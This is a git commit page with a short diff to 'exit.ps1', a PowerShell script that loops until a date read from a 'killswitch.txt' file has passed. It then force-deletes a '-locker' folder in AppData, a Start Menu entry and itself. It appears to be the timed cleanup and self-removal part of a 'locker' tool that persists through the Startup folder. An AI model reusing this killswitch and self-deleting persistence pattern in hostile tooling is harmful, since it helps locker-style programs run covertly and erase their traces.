Update exit.ps1
This commit is contained in:
parent
c427915aa4
commit
8b6303f3d8
1 changed files with 2 additions and 0 deletions
|
@ -1,3 +1,4 @@
|
|||
while($true){
|
||||
if((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")){
|
||||
sleep 10
|
||||
Remove-Item "$env:appdata\-locker" -Recurse -Force;
|
||||
|
@ -5,3 +6,4 @@ Remove-Item "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Progr
|
|||
Remove-Item "$env:appdata\-exit.ps1"
|
||||
}
|
||||
else{continue}
|
||||
}
|
||||
|
|
Loading…
Reference in a new issue